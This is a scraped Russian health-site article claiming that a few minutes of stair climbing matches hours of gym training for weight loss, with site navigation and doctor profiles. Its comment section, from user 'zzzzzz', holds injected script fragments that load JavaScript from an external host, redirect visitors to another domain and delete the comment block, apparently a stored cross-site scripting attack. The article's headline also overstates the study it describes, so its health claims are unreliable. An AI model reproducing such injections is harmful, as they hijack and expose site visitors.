Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ура! Ходить по лестнице т...  >>  Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал!
 
Обратная связь
 

Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал!

Размер шрифта
16 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Иванникова
Здоровье инфо
  • google_analytics: false
  • Нравится

В ходе американского исследования, было доказано, что 2-3-минутная ходьба по лестнице также полезна, как и 2-3 часа интенсивных занятий в спортзале!

ходить по лестнице так же эффективно для похудения, как и ходить в спортзал

В американском исследовании, куда вошли более 6 000 добровольцев, врачи изучали эффективность занятий в спортзале. Часть обследуемых регулярно занимались в тренажерном зале по несколько часов, а часть вели обычный образ жизни, но поднимались по лестнице, а не на лифте. Полученные результаты исследования шокируют! Небольшие, но регулярные физические нагрузки также способствуют снижению уровня холестерина, веса и давления, как и интенсивные занятия в спортзале!

Автор исследования Поль Лопринци связывает это с тем, что в повседневной жизни нам редко удается заниматься спортом в связи с нехваткой времени. Но он призывает людей делать хотя бы минимальные упражнения без отрыва от любимых занятий. Например, если вы любитель поговорить по телефону – не сидите, а ходите во время диалога! Всего лишь 10% людей, которые покупают себе абонемент в спортзале, посещают его ежедневно. Большинство же находят тысячу причин, чтобы избежать его.

Для поддержания здоровья и снижения веса, оказывается, достаточно выделять на тренировки по 30 минут в день. И для этого необязательно специально отводить время! Во время просмотра рекламы по телевизору, сделайте пару приседаний или отжиманий. Или выходите на одну остановку раньше и прогуляйтесь до дома пешком.

Участники этого исследования носили специальные устройства, которые определяли степень физической активности. И согласно полученным данным, в группе с обычной, но регулярной физической активностью, значительно снизились вес и уровень холестерина, а объем талии уменьшился у 89% добровольцев.

Весомый аргумент в пользу лестниц и зарядки!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как похудеть с помощью скандинавской ходьбы   Ваша скорость предскажет продолжительность жизни! 9 поводов погулять!   Сможет ли наша сборная выиграть чемпионат мира?   3 комплекса упражнений для похудения  
15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал! 26 января 2011Почему в старости спорт бесполезен
 
04 апреля 2013Когда делать зарядку, чтобы худеть быстрее 03 мая 2013Делай меньше, худей также! Ученые разработали суперсхему
 

Слайдшоу

1
Зарядка для похудения
5 лучших занятий
Гимнастика

Тесты

1
Правильно ли вы худеете?
Готовы ли вы сбросить лишнее?
Что вы знаете о цистите?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.